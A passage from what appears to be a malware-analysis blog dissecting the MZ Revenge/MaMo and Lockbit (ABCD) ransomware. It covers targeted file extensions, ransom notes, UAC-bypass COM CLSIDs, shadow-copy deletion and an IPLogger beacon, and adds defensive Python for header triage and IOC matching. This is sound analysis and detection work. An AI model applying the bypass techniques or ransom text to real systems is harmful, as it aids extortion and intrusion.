<p><center><img alt="MZ Header" src="https://dissectingmalwa.re/img/project-mz.png"></center></p>
<p></br></p>
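<p>To turn the MZP observation above into a check you can run during triage, here is an added example (not code from the original post): it reads the DOS header, flags the "P" that Borland/Delphi linkers leave in the third byte (the low byte of e_cblp), follows e_lfanew to the PE signature and pulls out the DOS stub text. The two PE-like byte strings are constructed stand-ins, not real binaries.</p>

```python
"""Added example, not from the original post: DOS header triage for the 'MZP' marker."""
import struct

DOS_HEADER_LEN = 64  # IMAGE_DOS_HEADER is 64 bytes; e_lfanew sits at offset 0x3C


def longest_printable_run(buf, min_len=8):
    """Longest run of printable ASCII (0x20-0x7E); the stub message stands out
    this way without knowing the exact stub code in front of it."""
    best, cur = b"", bytearray()
    for b in buf:
        if 0x20 <= b <= 0x7E:
            cur.append(b)
            continue
        if len(cur) > len(best):
            best = bytes(cur)
        cur = bytearray()
    if len(cur) > len(best):
        best = bytes(cur)
    return best.decode("ascii") if len(best) >= min_len else ""


def dos_header_info(data):
    if len(data) < DOS_HEADER_LEN or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew < DOS_HEADER_LEN or e_lfanew + 4 > len(data):
        raise ValueError("e_lfanew does not point inside the file")
    return {
        # byte 2 is the low byte of e_cblp; Borland/Delphi linkers write 'P' there,
        # so the file starts with the ASCII string "MZP"
        "borland_marker": data[2:3] == b"P",
        "e_lfanew": e_lfanew,
        "pe_signature": data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00",
        "stub_message": longest_printable_run(data[DOS_HEADER_LEN:e_lfanew]),
    }


# Constructed samples (not real malware): 64-byte DOS header, a tiny stub whose
# code bytes are followed by the message text, then the PE signature.
STUB_CODE = bytes.fromhex("0e1fba0e00b409cd21b8014ccd219090")


def make_sample(marker, message):
    header = bytearray(DOS_HEADER_LEN)
    header[:len(marker)] = marker
    stub = STUB_CODE + message + b"\r\r\n$"
    struct.pack_into("<I", header, 0x3C, DOS_HEADER_LEN + len(stub))
    return bytes(header) + stub + b"PE\x00\x00" + bytes(20)


DELPHI_LIKE = make_sample(b"MZP", b"This program must be run under Win32")
MSVC_LIKE = make_sample(b"MZ", b"This program cannot be run in DOS mode.")

if __name__ == "__main__":
    for name, sample in (("delphi-like", DELPHI_LIKE), ("msvc-like", MSVC_LIKE)):
        print(name, dos_header_info(sample))
```

<p>The same function can be pointed at the first few hundred bytes of a real sample; only the header and stub are read, nothing is executed.</p>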
<p>Because loading a Delphi executable into IDA or Ghidra can be very painful to look at I'll try out a tool I haven't used before. It is called "Interactive Delphi Reconstructor" (IDR in short) and the setup is trivial. Just clone the Git Repository and download the Knowledge Base files linked at the bottom and extract + paste them into the source folder.</p>
<p></br></p>
<p><center><a href="https://github.com/crypto2011/IDR">crypto2011/IDR on GitHub</a></center></p>
<p>For those playing along at home it should look something like this after the auto-analysis finished:</p>
<p><center><img alt="IDR in action" src="https://dissectingmalwa.re/img/project-idr.png"></center></p>
<p></br></p>
<p>Looking at the Strings tab I noticed this weird GUID <em>{43826d1e-e718-42ee-bc55-a1e261c37bfe}</em>. I'll have to investigate further to say for sure, but looking at this document from the <a href="https://wikileaks.org/ciav7p1/cms/page_3375231.html">CIA Vault7 Leaks</a> this might be part of a UAC bypass.</p>
<p>I also grabbed the extension list the ransomware uses. It will target the following extensions:</p>
<div class="highlight"><pre><span></span><span class="na">.txt</span><span class="c">;.doc;.docx;.intex;.pdf;.zip;.rar;.onetoc;.css;.lnk;.xlsx;.ppt;.pptx;.odt;.jpg;.bmp;.ods;.png;.csv;.sql;.mdb;.sln;.php;.asp;.aspx;.odp;.html;.xml;.psd;.bk;.bat;.mp3;.mp4;.wav;.mdf;.ost;.wma;.avi;.divx;.mkv;.mpeg;.wmv;.mov;.ogg;.mid;.gif;.jpeg;.cs;.vb;.vbproj;.py;.asmx;.json;.mov;.jpe;.dib;.h;.cpp;.ico;.suo;.c;.vcxproj;.mml;.otp;.VDPROJ;.vcxitems;.py3;.pyc;.pyde;.resx;.pdb;.msg;.manifest;.settings;.dat;.jar;.ps1;.htm;.f3d;.myd;.dwg;.rtf;.apk;.iso;.7-zip;.ace;.arj;.bz2;.myi;.cab;.gzip;.lzh;.tar;.uue;.xz;.z;.001;.mpg;.odg;.core;.crproj;.pas;.db;.torrent;.csptoj;.config;.nef;.bin;.enigma;.log;.ovpn;.rc;.url;.csh;.cvproj;.odb;.dproj;.cfg;.csm;.7z;.3dm;.3ds;.3g2;.3gp;.602;.ost;.123;.ARC;.PAQ;.accdb;.aes;.ai;.asc;.asf;.backup;.bak;.brd;.cgm;.class;.cmd;.crt;.csr;.dbf;.dch;.otg;.der;.dif;.dip;.djvu;.docb;.docm;.dot;.dot;.dotm;.dotx;.dwg;.edb;.eml;.fla;.flv;.frm;.gpg;.gz;.hwp;.ibd;.java;.js;.sp;.key;.lay;.lay6;.ldf;.m3u;.m4u;.max;.ott;.p12;.pem;.pfx;.pl;.pot;.potm;.potx;.ppam;.pps;.ppsm;.ppsx;.pptm;.pst;.raw;.rb;.sch;.sh;.sldm;.sldx;.slk;.snt;.sqlite3;.sqlitedb;.stc;.std;.sti;.stw;.svg;.swf;.sxc;.sxd;.sxi;.sxm;.sxw;.tbk;.tgz;.tif;.tiff;.uop;.uot;.vbs;.vcd;.vdi;.vmdk;.vbe;.vmx;.vob;.vsd;.vsdx;.wb2;.wk1;.wks;.xlc;.xlm;.xlsb;.xlsm;.xlt;.xltm;.xltx;.xlw;.mkv;.img;.vbox</span>
</pre></div>
<p></br></p>
<p>As suspected by @HILDAKRYPT on Twitter, the creators of the Turkish KesLan ransomware might also have built MZ Revenge / MaMo.</p>
<p></br></p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr">The <a href="https://twitter.com/hashtag/KesLan?src=hash&ref_src=twsrc%5Etfw">#KesLan</a> and <a href="https://twitter.com/hashtag/MZREVENGE?src=hash&ref_src=twsrc%5Etfw">#MZREVENGE</a> <a href="https://twitter.com/hashtag/Ransomware?src=hash&ref_src=twsrc%5Etfw">#Ransomware</a> authors are the same person, the canonical name is <a href="https://twitter.com/hashtag/MaMo434376?src=hash&ref_src=twsrc%5Etfw">#MaMo434376</a> (as referred in the code) cc <a href="https://twitter.com/BleepinComputer?ref_src=twsrc%5Etfw">@BleepinComputer</a> <a href="https://twitter.com/demonslay335?ref_src=twsrc%5Etfw">@demonslay335</a> <a href="https://twitter.com/GrujaRS?ref_src=twsrc%5Etfw">@GrujaRS</a> <a href="https://twitter.com/raby_mr?ref_src=twsrc%5Etfw">@raby_mr</a> <a href="https://twitter.com/Amigo_A_?ref_src=twsrc%5Etfw">@Amigo_A_</a> <a href="https://t.co/HQCuTWgJoH">pic.twitter.com/HQCuTWgJoH</a></p>— HILDACRYPT (@HILDAKRYPT) <a href="https://twitter.com/HILDAKRYPT/status/1204783762267082757?ref_src=twsrc%5Etfw">December 11, 2019</a></blockquote></center></p>
<p></br></p>
<p><strong>Update 15.12.2019:</strong></p>
<p>A new Version of this strain was found to be appending <em>.aes</em> to encrypted files. This time there is no ransomnote though, so let's see if this is a malfunction or intentional.</p>
<p>The Any.Run Analysis can be found <a href="https://app.any.run/tasks/ee090f98-3499-4075-9e3c-e71479092621/">here</a>.</p>
<p>Visually this sample resembles the look of the "MZ Revenge 1.0" strain with an empty Form and the red DX icon.</p>
<p><center><img alt="AES empty form" src="https://dissectingmalwa.re/img/project-form2.png"></center></p>
<p></br></p>
<h2><strong>MITRE ATT&CK</strong></h2>
<p><em>T1215</em> --> Kernel Modules and Extensions --> Persistence</p>
<p><em>T1045</em> --> Software Packing --> Defense Evasion</p>
<p><em>T1056</em> --> Input Capture --> Credential Access</p>
<p><em>T1012</em> --> Query Registry --> Discovery</p>
<p><em>T1124</em> --> System Time Discovery --> Discovery</p>
<p><em>T1083</em> --> File and Directory Discovery --> Discovery</p>
<p><em>T1076</em> --> Remote Desktop Protocol --> Lateral Movement</p>
<p><em>T1056</em> --> Input Capture --> Collection</p>
<p><em>T1115</em> --> Clipboard Data --> Collection</p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>MZRevenge / MaMo434376</h3>
<h3>Registry Keys</h3>
<div class="highlight"><pre><span></span><span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">Software</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">CurrentVersion</span><span class="err">\</span><span class="n">Policies</span><span class="err">\</span><span class="k">System</span>
<span class="c1">--> DisableTaskMgr = 1</span>
<span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">Software</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">CurrentVersion</span><span class="err">\</span><span class="n">Internet</span> <span class="n">Settings</span><span class="err">\</span><span class="n">ZoneMap</span>
<span class="c1">--> UNCAsIntranet = 0</span>
</pre></div>
<h3>E-Mail Addresses</h3>
<div class="highlight"><pre><span></span><span class="n">helpdesk_mz</span><span class="nv">@aol</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
</pre></div>
<h3>Ransomnote V1</h3>
<div class="highlight"><pre><span></span><span class="nv">ATTENTION</span><span class="o">!</span>
<span class="nv">Don</span><span class="o">*</span><span class="nv">t</span> <span class="nv">worry</span>, <span class="nv">you</span> <span class="nv">can</span> <span class="k">return</span> <span class="nv">all</span> <span class="nv">your</span> <span class="nv">files</span><span class="o">!</span>
<span class="nv">All</span> <span class="nv">your</span> <span class="nv">files</span> <span class="nv">like</span> <span class="nv">photos</span>, <span class="nv">databases</span>, <span class="nv">documents</span> <span class="nv">and</span> <span class="nv">other</span> <span class="nv">important</span> <span class="nv">are</span> <span class="nv">encrypted</span> <span class="nv">with</span> <span class="nv">strongest</span> <span class="nv">encryption</span> <span class="nv">and</span> <span class="nv">unique</span> <span class="nv">key</span>.
<span class="nv">The</span> <span class="nv">only</span> <span class="nv">method</span> <span class="nv">of</span> <span class="nv">recovering</span> <span class="nv">files</span> <span class="nv">is</span> <span class="nv">to</span> <span class="nv">purchase</span> <span class="nv">decrypt</span> <span class="nv">tool</span> <span class="nv">and</span> <span class="nv">unique</span> <span class="nv">key</span> <span class="k">for</span> <span class="nv">you</span>.
<span class="nv">This</span> <span class="nv">software</span> <span class="nv">will</span> <span class="nv">decrypt</span> <span class="nv">all</span> <span class="nv">your</span> <span class="nv">encrypted</span> <span class="nv">files</span>.
<span class="nv">What</span> <span class="nv">guarantees</span> <span class="nv">you</span> <span class="nv">have</span>?
<span class="nv">You</span> <span class="nv">can</span> <span class="k">send</span> <span class="nv">one</span> <span class="nv">of</span> <span class="nv">your</span> <span class="nv">encrypted</span> <span class="nv">file</span> <span class="nv">from</span> <span class="nv">your</span> <span class="nv">PC</span> <span class="nv">and</span> <span class="nv">we</span> <span class="nv">decrypt</span> <span class="nv">it</span> <span class="k">for</span> <span class="nv">free</span>.
<span class="nv">But</span> <span class="nv">we</span> <span class="nv">can</span> <span class="nv">decrypt</span> <span class="nv">only</span> <span class="mi">1</span> <span class="nv">file</span> <span class="k">for</span> <span class="nv">free</span>. <span class="nv">File</span> <span class="nv">must</span> <span class="nv">not</span> <span class="nv">contain</span> <span class="nv">valuable</span> <span class="nv">information</span>.
<span class="nv">Price</span> <span class="nv">of</span> <span class="nv">private</span> <span class="nv">key</span> <span class="nv">and</span> <span class="nv">decrypt</span> <span class="nv">software</span> <span class="nv">is</span> <span class="mh">$300</span>.
<span class="nv">Discount</span> <span class="mi">50</span><span class="o">%</span> <span class="nv">available</span> <span class="k">if</span> <span class="nv">you</span> <span class="nv">contact</span> <span class="nv">us</span> <span class="nv">first</span> <span class="mi">72</span> <span class="nv">hours</span>, <span class="nv">thats</span> <span class="nv">price</span> <span class="k">for</span> <span class="nv">you</span> <span class="nv">is</span> <span class="mh">$150</span>.
<span class="nv">Please</span> <span class="nv">note</span> <span class="nv">that</span> <span class="nv">you</span><span class="o">*</span><span class="nv">ll</span> <span class="nv">never</span> <span class="nv">restore</span> <span class="nv">your</span> <span class="nv">data</span> <span class="nv">without</span> <span class="nv">payment</span>.
<span class="nv">Check</span> <span class="nv">your</span> <span class="nv">e</span><span class="o">-</span><span class="nv">mail</span> <span class="s2">"</span><span class="s">Spam</span><span class="s2">"</span> <span class="nv">or</span> <span class="s2">"</span><span class="s">Junk</span><span class="s2">"</span> <span class="nv">folder</span> <span class="k">if</span> <span class="nv">you</span> <span class="nv">don</span><span class="o">*</span><span class="nv">t</span> <span class="nv">get</span> <span class="nv">answer</span> <span class="nv">more</span> <span class="nv">than</span> <span class="mi">6</span> <span class="nv">hours</span>.
<span class="nv">e</span><span class="o">-</span><span class="nv">mail</span> <span class="nv">address</span> <span class="nv">to</span> <span class="k">send</span> <span class="nv">your</span> <span class="nv">file</span> <span class="nv">and</span> <span class="nv">To</span> <span class="nv">get</span> <span class="nv">this</span> <span class="nv">software</span> <span class="nv">you</span> <span class="nv">need</span> <span class="nv">write</span> <span class="nv">on</span> <span class="nv">my</span> <span class="nv">e</span><span class="o">-</span><span class="nv">mail</span>:
<span class="nv">helpdesk_mz</span>@<span class="nv">aol</span>.<span class="nv">com</span>
<span class="nv">Your</span> <span class="nv">Decryption</span> <span class="nv">Key</span> <span class="ss">(</span><span class="k">DO</span> <span class="nv">NOT</span> <span class="nv">WIPE</span> <span class="nv">OR</span> <span class="nv">CHANGE</span> <span class="nv">THIS</span> <span class="nv">SWITCH</span><span class="o">!</span><span class="ss">)</span> :
[<span class="nv">redacted</span>]
</pre></div>
<h3>Ransomnote V2</h3>
<div class="highlight"><pre><span></span><span class="o">---></span> <span class="nv">MZ</span> <span class="nv">REVENGE</span> <span class="mi">1</span>.<span class="mi">0</span> <span class="o"><---</span>
<span class="nv">Dont</span> <span class="nv">worry</span>, <span class="nv">some</span> <span class="nv">of</span> <span class="nv">your</span> <span class="nv">files</span> <span class="nv">have</span> <span class="nv">extension</span> .<span class="nv">MZ173801</span> <span class="nv">and</span> <span class="nv">they</span> <span class="nv">are</span> <span class="nv">encrypted</span>.
<span class="nv">In</span> <span class="nv">confirmatiom</span>, <span class="nv">that</span> <span class="nv">we</span> <span class="nv">have</span> <span class="nv">private</span> <span class="nv">decryption</span> <span class="nv">key</span>,
<span class="nv">We</span> <span class="nv">can</span> <span class="nv">provide</span> <span class="nv">test</span> <span class="nv">decryption</span> <span class="k">for</span> <span class="mi">1</span> <span class="nv">file</span> <span class="ss">(</span><span class="nv">png</span>,<span class="nv">jpg</span>,<span class="nv">bmp</span>,<span class="nv">gif</span><span class="ss">)</span>.
<span class="nv">Its</span> <span class="nv">a</span> <span class="nv">business</span>, <span class="k">if</span> <span class="nv">we</span> <span class="nv">cant</span> <span class="nv">provide</span> <span class="nv">full</span> <span class="nv">decryption</span>, <span class="nv">other</span> <span class="nv">people</span> <span class="nv">wont</span> <span class="nv">trust</span> <span class="nv">us</span>.
<span class="nv">There</span> <span class="nv">is</span> <span class="nv">no</span> <span class="nv">way</span> <span class="nv">to</span> <span class="nv">decrypt</span> <span class="nv">your</span> <span class="nv">files</span> <span class="nv">without</span> <span class="nv">our</span> <span class="nv">help</span>.
<span class="nv">Dont</span> <span class="nv">trust</span> <span class="nv">anyone</span>. <span class="nv">Even</span> <span class="nv">your</span> <span class="nv">cat</span>.
<span class="nv">Main</span> <span class="nv">mail</span>: <span class="nv">helpdesk_mz</span>@<span class="nv">aol</span>.<span class="nv">com</span>
<span class="nv">Dont</span> <span class="nv">change</span> <span class="nv">decryption</span> <span class="nv">key</span> <span class="nv">below</span><span class="o">!!!</span>
<span class="nv">MZ</span> <span class="nv">DECRYPTION</span> <span class="nv">KEY</span>:
[<span class="nv">redacted</span>]
</pre></div>
<p></br></p>A B C, easy as один, два, три - Lockbit (ABCD) Ransomware2019-12-05T00:00:00+01:002019-12-05T00:00:00+01:00f0wLtag:dissectingmalwa.re,2019-12-05:/a-b-c-easy-as-odin-dva-tri-lockbit-abcd-ransomware.html<p>Let's continue with the obscure music -> malware references by analysing Lockbit, a strain that has been around for a few weeks, but with very little info about its origin and behaviour.</p><p>I got this sample from one of the victims posting in the <a href="https://www.bleepingcomputer.com/forums/t/706361/abcd-ransomware-abcd-restore-my-filestxt">Bleeping Computer</a> forum thread. From what I gather their systems fell to yet another RDP brute-force attack (one user was affected on multiple systems in their domain).</p>
<p><center><img alt="Logo" src="https://dissectingmalwa.re/img/abcd-header.png"></center></p>
<h4><em>A general disclaimer as always: downloading and running the samples linked below will lead to the encryption of your personal data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<p>ABCD @ <a href="https://app.any.run/tasks/192293c2-3d05-4874-85ae-ce006c3d68db">AnyRun</a> | <a href="https://www.virustotal.com/gui/file/70cb1a8cb4259b72b704e81349c2ad5ac60cd1254a810ef68757f8c9409e3ea6/detection">VirusTotal</a> | <a href="https://www.hybrid-analysis.com/sample/70cb1a8cb4259b72b704e81349c2ad5ac60cd1254a810ef68757f8c9409e3ea6/5de68fd5147c6120bb7d5d0c">HybridAnalysis</a>
--> <code>sha256 3c9f777654a45eb6219f12c2ad10082043814389a4504c27e5aec752a8ee4ded</code></p>
<p>Sadly no .NET this time around, but an uncommonly recent Version of Visual Studio was used to compile this binary.</p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/abcd-die.png"></center></p>
<p></br></p>
<p>Entropy-wise it looks very "clean" as well, no stray sections or big spikes in the graph. It might not even be obfuscated 🤔.</p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/abcd-entropy.png"></center></p>
<p></br></p>
<p>Opening an encrypted file provided by a victim I can't spot a file marker or other identifying artifacts anywhere. Most Crimeware Devs don't tamper with the original files to keep the code complexity at a minimum, since the biggest portion of criminals are far from being skilled programmers.</p>
<p><center><img alt="Opening an encrypted file in the Hexeditor" src="https://dissectingmalwa.re/img/abcd-filehex.png"></center></p>
<p></br></p>
<p>Opening up IDA this Graph is one of the first things I saw after the auto-analysis finished. Looks kinda complicated, so let's see what this sample has got in store for us.</p>
<p><center><img alt="Weird Structure" src="https://dissectingmalwa.re/img/abcd-structure.png"></center></p>
<p></br></p>
<p>The Ransomware uses FindNextFileW to look for files to encrypt. Since this function is likely to cause errors if implemented incorrectly, they built themselves some kind of workaround: every time the function call fails they write to the Log with the message below.</p>
<p><center><img alt="FindFiles Function" src="https://dissectingmalwa.re/img/abcd-findfiles.png"></center></p>
<p></br></p>
<p>Here we can see some kind of arbitrary file system path (does not seem to be a "kill switch" as it will still encrypt files with the text file present) and a URL. This Web Address resolves to IPLogger[.]org, an IP tracking system often abused by Malware.</p>
<p><center><img alt="File Path and IPLogger URL" src="https://dissectingmalwa.re/img/abcd-path.png"></center></p>
<p></br></p>
<p>Lockbit creates a Mutex to protect its resources and components. The distinct name of this Mutex, which we'll discover later, will tell us a lot about this strain.</p>
<p><center><img alt="Mutex Creation" src="https://dissectingmalwa.re/img/abcd-mutx.png"></center></p>
<p></br></p>
<p>I'm not sure if this string comparison structure was interpreted in that way by IDA or if the code is built like that, but this would certainly qualify as amateur hour.</p>
<p><center><img alt="Multiple chained String comparisons" src="https://dissectingmalwa.re/img/abcd-strcomp.png"></center></p>
<p></br></p>
<p>This part of the Graph shows how the Log (weirdly enough it uses the extension .reg, e.g. <em>resultlog6.reg</em>, see below) that the Ransomware drops on the Desktop is generated. Every time a file is skipped in the encryption process it will add a line to the log. For example, "skipped by Extension" is the classic ransomware behaviour of filtering for suffixes like <em>.dll, .exe, .sys, .lnk, .reg, .txt</em>, while "skipped by filename" corresponds to files created by the ransomware and necessary system files. "Skipped by SYSTEm" is logged for files that are in use by Windows Processes. </p>
<p><center><img alt="Log Messages for skipped files" src="https://dissectingmalwa.re/img/abcd-skipped.png"></center></p>
<p><center><img alt="Log Messages for skipped files" src="https://dissectingmalwa.re/img/abcd-log.png"></center></p>
<p></br></p>
<p>The same procedure as every year: Deleting Restore Points and Shadow copies plus disabling startup recovery via <em>ShellExecuteEx</em>.</p>
<p><center><img alt="Deletion of Backups and Shadowcopies" src="https://dissectingmalwa.re/img/abcd-shellcmds.png"></center></p>
<p></br></p>
<p>The txt File that will be dropped into every directory up for encryption will be called <em>Restore-My-Files.txt</em>.</p>
<p><center><img alt="The Ransomnote" src="https://dissectingmalwa.re/img/abcd-note.png"></center></p>
<p></br></p>
<p>As the ransomnote is pretty short and bare-bones they just hardcoded the strings right in without any obfuscation/encryption.
<center><img alt="Ransomnote being written to a file" src="https://dissectingmalwa.re/img/abcd-note2.png"></center></p>
<p></br></p>
<p>And that is how Lockbit gets its name :D It creates a Registry Key in <strong>HKEY_CURRENT_USER\SOFTWARE\Lockbit</strong> with two values called <em>full</em> and <em>Public</em>. <em>full</em> contains the victim ID displayed in the Ransomnote in hex format.</p>
<p><center><img alt="How Lockbit got its name" src="https://dissectingmalwa.re/img/abcd-lockbit.png"></center></p>
<p></br>
</br></p>
<p>If you read my post about MedusaLocker you might remember this UAC Bypass via <em>{3E5FC7F9-9A51-4367-9063-A120244FBEC7}</em>, exploiting the <strong>ICMLuaUtil</strong> elevated COM Interface-Object. This Bypass has worked since Windows 7 and has not been fixed since.</p>
<p><center><img alt="ICMLuaUtil CLSID" src="https://dissectingmalwa.re/img/abcd-clsid.png"></center></p>
<p><center><img alt="User Access Control Bypass" src="https://dissectingmalwa.re/img/abcd-uac.png"></center></p>
<p></br></p>
<p>What I thought would be another UAC Bypass is actually a variant of the one above. The CLSID <em>{D2E7041B-2927-42fb-8E9F-7CE93B6DC937}</em> refers to the ColorDataProxy COM Object, which is classified as the same Bypass method in hfiref0x's <a href="https://github.com/hfiref0x/UACME">UACME</a>, method #43.</p>
<p><center><img alt="User Access Control Bypass" src="https://dissectingmalwa.re/img/abcd-uac3.png"></center></p>
<p></br>
</br></p>
<p>Speaking of UAC Bypasses: After debugging a bit further the Malware started to reference a strange Registry Key <em>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ICM\Calibration\DisplayCalibrator</em> that normally doesn't have anything to do with malicious actions. </p>
<p><center><img alt="Calibration UAC" src="https://dissectingmalwa.re/img/abcd-cal.png"></center></p>
<p></br></p>
<p>Plugging the key into a search engine gives us this tweet by <em>@James_inthe_box</em> from January of this year:</p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr">Hey <a href="https://twitter.com/Hexacorn?ref_src=twsrc%5Etfw">@Hexacorn</a> you ever see key:<br><br>"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ICM\Calibration\DisplayCalibrator<br><br>used as persistence? Thanks to <a href="https://twitter.com/justmlwhunting?ref_src=twsrc%5Etfw">@justmlwhunting</a> for having me look at a @huadhservhelper sample. <a href="https://t.co/qyKA5iGaEd">pic.twitter.com/qyKA5iGaEd</a></p>— James (@James_inthe_box) <a href="https://twitter.com/James_inthe_box/status/1084982201496657921?ref_src=twsrc%5Etfw">January 15, 2019</a></blockquote></center></p>
<p></br></p>
<p>After a successful encryption run the Ransomware tries to contact a Server hosted at Hetzner in Germany which belongs to IPlogger, a service that seems to be quite popular with cybercriminals, as can be seen in the previous analysis of <strong>SaveTheQueen</strong>.</p>
<p><center><img alt="Use of IPlogger.org" src="https://dissectingmalwa.re/img/abcd-ip2.png"></center></p>
<p></br></p>
<p><center><img alt="Use of IPlogger.org" src="https://dissectingmalwa.re/img/abcd-iplog.png"></center></p>
<p></br>
</br></p>
<p>So let's talk a bit about Attribution / Genealogy. I'm not a fan of desperately trying to identify the actors behind samples / "campaigns" without conclusive proof, but in this case there is some pretty compelling evidence:</p>
<p>First off we have this String <em>XO1XADpO01</em> in the Lockbit sample that was also used in the PhobosImposter Ransomware. Even better: the name and content of the ransomnote are very similar as well, as can be seen in this <a href="https://id-ransomware.blogspot.com/2019/10/phobosimposter-ransomware.html">article</a> written by Amigo-A.</p>
<p><center><img alt="The XO1XADpO01 string in the Lockbit sample" src="https://dissectingmalwa.re/img/abcd-weird.png"></center></p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr">2019-10-25: 🤡<a href="https://twitter.com/hashtag/PhobosImposter?src=hash&ref_src=twsrc%5Etfw">#PhobosImposter</a> "XO1XADpO01" Mutex <a href="https://twitter.com/hashtag/Ransomware?src=hash&ref_src=twsrc%5Etfw">#Ransomware</a>|<br>Ref -> <a href="https://t.co/CebnlFH1cK">https://t.co/CebnlFH1cK</a><br>Another Variant ▶️<br>🧬BCryptGenRandom | aeskeygenassist | aes_sbox func<br>Task Kill <br>MD5: 7c8165be532d14c3b2bc81716d23f4ca<br>h/t <a href="https://twitter.com/malwrhunterteam?ref_src=twsrc%5Etfw">@malwrhunterteam</a> team <a href="https://t.co/QnTILUTAnk">pic.twitter.com/QnTILUTAnk</a></p>— Vitali Kremez (@VK_Intel) <a href="https://twitter.com/VK_Intel/status/1187805345336434689?ref_src=twsrc%5Etfw">October 25, 2019</a></blockquote></center></p>
<p>The E-Mail Accounts (goodmen@countermail[.]com) used in two of the reported cases also make the connection to the Goodmen Ransomware, which again features a note named <em>Restore-My-Files.txt</em>, and even the binaries are named similarly to this strain, sticking to the <em>RICK.exe</em> naming scheme. A more detailed description by Amigo-A can be found <a href="https://id-ransomware.blogspot.com/2019/08/good-goodmen-ransomware.html">here</a>.</p>
<p></br></p>
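<p>To turn the artifacts above into a host-level check, here is an added example (my own code, not from the Lockbit analysis or any tool it mentions): a small Python triage routine that matches constructed, Sysmon-style event records against the registry key, ransom note, Desktop log, mutex, UAC-bypass CLSIDs and IPLogger endpoint described above. The event shape, the three-directory threshold for flagging mass note drops, and the dllhost command line in the sample data are assumptions.</p>

```python
import re

# Artifacts from the Lockbit (ABCD) analysis above, kept in their published (defanged) form.
REGISTRY_MARKER = r"\software\lockbit"          # HKEY_CURRENT_USER\SOFTWARE\Lockbit (any hive prefix)
NOTE_NAME = "Restore-My-Files.txt"               # dropped into every directory it encrypts
LOG_NAME_RE = re.compile(r"resultlog\d*\.reg$")  # e.g. resultlog6.reg on the Desktop
MUTEX_NAME = "XO1XADpO01"                        # shared with PhobosImposter
UAC_CLSIDS = (
    "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",  # ICMLuaUtil elevated COM interface
    "{D2E7041B-2927-42fb-8E9F-7CE93B6DC937}",  # ColorDataProxy, UACME method #43
)
IPLOGGER_URL = "hxxps://iplo[.]ru/1LJjq7.txt"
IPLOGGER_IP = "88.99.66[.]31"
NOTE_DIR_THRESHOLD = 3  # assumed cut-off: notes in this many directories = mass encryption


def refang(indicator: str) -> str:
    """Turn the published defanged form (hxxps, [.]) back into a matchable string."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


def _norm_path(path: str) -> str:
    return path.replace("/", "\\").lower()


def triage(events):
    """Return a sorted list of (indicator, detail) hits for a list of event dicts.

    Event shape is a constructed, Sysmon-like simplification (assumption):
      {"type": "registry", "key": ...}
      {"type": "file", "path": ...}
      {"type": "process", "image": ..., "cmdline": ...}
      {"type": "network", "dst": ..., "url": ...}
      {"type": "mutex", "name": ...}   # e.g. taken from a sandbox report
    """
    hits = []
    note_dirs = set()
    clsids = [c.lower() for c in UAC_CLSIDS]
    for ev in events:
        kind = ev.get("type")
        if kind == "registry":
            key = _norm_path(ev.get("key", ""))
            if REGISTRY_MARKER in key:
                hits.append(("registry_key", ev["key"]))
            if any(c in key for c in clsids):
                hits.append(("uac_bypass_clsid", ev["key"]))
        elif kind == "file":
            path = _norm_path(ev.get("path", ""))
            directory, _, name = path.rpartition("\\")
            if name == NOTE_NAME.lower():
                note_dirs.add(directory)
            if LOG_NAME_RE.search(name) and "\\desktop\\" in directory + "\\":
                hits.append(("skip_log_on_desktop", ev["path"]))
        elif kind == "process":
            cmd = ev.get("cmdline", "")
            if any(c in cmd.lower() for c in clsids):
                hits.append(("uac_bypass_clsid", cmd))
        elif kind == "network":
            if ev.get("dst") == refang(IPLOGGER_IP) or ev.get("url", "").startswith(refang(IPLOGGER_URL)):
                hits.append(("iplogger_beacon", ev.get("url") or ev.get("dst")))
        elif kind == "mutex":
            if ev.get("name") == MUTEX_NAME:
                hits.append(("mutex", ev["name"]))
    if note_dirs:
        n = len(note_dirs)
        tag = "ransom_notes_mass" if n >= NOTE_DIR_THRESHOLD else "ransom_note"
        hits.append((tag, f"{n} director{'y' if n == 1 else 'ies'}"))
    return sorted(set(hits))


# Constructed sample telemetry for this example, not a real capture.
SAMPLE_EVENTS = [
    {"type": "mutex", "name": "XO1XADpO01"},
    # assumed shape: COM surrogate started with the elevated CLSID on its command line
    {"type": "process", "image": r"C:\Windows\System32\dllhost.exe",
     "cmdline": r"C:\Windows\System32\dllhost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"},
    {"type": "registry", "key": r"HKU\S-1-5-21-1-2-3-1001\Software\LockBit\full"},
    {"type": "file", "path": r"C:\Users\victim\Documents\Restore-My-Files.txt"},
    {"type": "file", "path": r"C:\Users\victim\Pictures\Restore-My-Files.txt"},
    {"type": "file", "path": r"C:\Shares\Finance\Restore-My-Files.txt"},
    {"type": "file", "path": r"C:\Users\victim\Desktop\resultlog6.reg"},
    {"type": "network", "dst": "88.99.66.31", "url": "https://iplo.ru/1LJjq7.txt"},
    {"type": "file", "path": r"C:\Users\victim\Desktop\notes.txt"},  # benign, must not match
]

if __name__ == "__main__":
    for indicator, detail in triage(SAMPLE_EVENTS):
        print(f"{indicator:22} {detail}")
```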
<h2><em>IOCs</em></h2>
<h3>Lockbit (ABCD)</h3>
